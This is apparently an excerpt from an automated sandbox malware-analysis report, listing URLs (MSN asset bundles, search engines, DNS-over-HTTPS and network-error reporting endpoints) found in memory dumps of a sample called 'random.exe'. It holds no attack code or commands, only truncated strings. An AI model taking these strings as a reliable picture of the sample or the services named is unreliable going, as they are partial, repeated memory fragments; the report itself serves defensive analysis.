Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.js47
Source: random.exe, 00000000.00000003.2221845562.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_feedback-service_dist_FeedbackAuth_js-web
Source: random.exe, 00000000.00000003.2221845562.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_location-service_dist_AutoSuggestService_
Source: random.exe, 00000000.00000003.2221845562.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_topics-shared-state_dist_TopicData_connec
Source: random.exe, 00000000.00000003.2221845562.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_weather-shared-wc_dist_weather-card_index
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/money-info.d4cdead79eb4adab8d02.js
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/money-info.d4cdead79eb4adab8d02.js340&w=0
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v1.fb4298238a214987dc13.js
Source: random.exe, 00000000.00000003.2220367398.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v1.fb4298238a214987dc13.jsa51bb7
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/nativeadstemplates.0610aec23b25fd495dd1.js
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.d639c3da7a2212403887.js
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.d639c3da7a2212403887.js=APP_ANON&s
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/serviceBasedChannelDataProvider.c1a23a05c9510f
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-control-wc.367cab6cb9bb41af1876.js
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.10b612b41321c229bd80.js
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.10b612b41321c229bd80.js716&w=0&anonc
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/superBreakingNews.2c317965ccb59781fd03.js
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.334afafb1912a9f141aa.js
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.334afafb1912a9f141aa.js1fd03.js
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346037519.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347582659.000001D2EAA65000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.e29eca8a01b21f77224b.js
Source: random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.e29eca8a01b21f77224b.jsKD
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/traffic-card-wc.cb07a9f89d030c8d6608.js
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.b4742062efdd1e38bfac.js
Source: random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.5e95a6e8b96055fbd144.js
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/waterfall-view-feed.22b320983ea8aae16e8a.js
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/weather-card-data-connector.344fb2a09f131a3e03
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/welcomeGreetingLight.d9ab3d372321b5935217.js
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/welcomeGreetingLight.d9ab3d372321b5935217.js1;
Source: random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/widgets-region.8d05e30d21e49c5dbd0b.js
Source: random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/widgets-region.8d05e30d21e49c5dbd0b.js_
Source: random.exe, 00000000.00000003.2149378613.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2168129632.000001D2E6CBA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/&os=windows&locale=
Source: random.exe, 00000000.00000003.2301128582.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300693729.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206755988.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2222912824.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2273159384.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2258616094.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/service/news/feed/pages/weblayout?User=m-035D89D9374366AE1C219CB0365A672A&act
Source: random.exe, 00000000.00000003.2167647087.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png
Source: random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svg
Source: random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svg2045.47
Source: random.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/common/icons/copilot_color.svg
Source: random.exe, 00000000.00000003.2182899619.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/FeedSettings.svg
Source: random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2297962610.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Excel_24x.svg
Source: random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Excel_24x.svg0.2045.47g&u=t
Source: random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Excel_24x.svg_
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneDrive_24x.svg
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneDrive_24x.svg716&w=0
Source: random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneNote_24x.svg
Source: random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Outlook_24x.svg
Source: random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2297962610.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/PowerBI_24x.svg
Source: random.exe, 00000000.00000003.2297962610.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Skype_24x.svgx.svgsvg=jpg&u=t.js03
Source: random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Sway_24x.svg
Source: random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Sway_24x.svg.0.2045.47
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svg
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svg_
Source: random.exe, 00000000.00000003.2205678914.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.json
Source: random.exe, 00000000.00000003.2167647087.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://azureedge.net
Source: random.exe, 00000000.00000003.2258616094.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
Source: random.exe, 00000000.00000003.2256465718.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272030607.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2258910715.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240877251.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285340825.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206209727.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2167302230.000001D2E6C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: random.exe, 00000000.00000003.2240877251.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusinesser
Source: random.exe, 00000000.00000003.2240877251.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusinessler
Source: random.exe, 00000000.00000003.2206209727.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusinessu
Source: random.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gif?rnd=1735943564647&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&t
Source: random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: random.exe, 00000000.00000003.2168129632.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com
Source: random.exe, 00000000.00000003.2185683186.000001D2EAA77000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2239960577.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2168968504.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2151510942.000001D2EAA83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: random.exe, 00000000.00000003.2168968504.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query0L
Source: random.exe, 00000000.00000003.2185683186.000001D2EAA77000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2151510942.000001D2EAA83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryL
Source: random.exe, 00000000.00000003.2239960577.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryed
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
Source: random.exe, 00000000.00000003.2239960577.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cleanbrowsing.org/privacy
Source: random.exe, 00000000.00000003.2185683186.000001D2EAA77000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257822518.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2151510942.000001D2EAA83000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2219726288.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240216428.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241586027.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241455616.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2186276781.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report
Source: random.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: random.exe, 00000000.00000003.2256465718.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285340825.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msne.com
Source: random.exe, 00000000.00000003.2185683186.000001D2EAA77000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2151510942.000001D2EAA83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msne.com/
Source: random.exe, 00000000.00000003.2299103289.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2219726288.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240216428.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241455616.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/reportcat=msn
Source: random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations/
Source: random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations/
